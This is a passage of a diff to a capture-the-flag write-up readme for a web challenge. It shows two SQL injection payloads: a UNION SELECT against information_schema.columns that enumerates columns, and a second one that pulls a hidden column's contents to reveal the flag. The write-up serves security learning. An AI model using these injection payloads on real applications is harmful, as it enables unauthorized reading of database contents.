aminnazri00/AturKreatif-2023/WEB/Out of the box/readme.md

 ```
 -1' UNION SELECT null,null,null,null,null,COLUMN_NAME FROM information_schema.columns--
 ```
+11. It will list out all columns that available and column f0undM3 that look suspicious.

-11. From both information we get, we can retrieve all data from other table by entering command below and found the flag
+12. From both information we get, we can retrieve all data from other table by entering command below and found the flag

 ```
 -1' UNION SELECT null,null,null,null,null,f0undM3 FROM w0wg00d--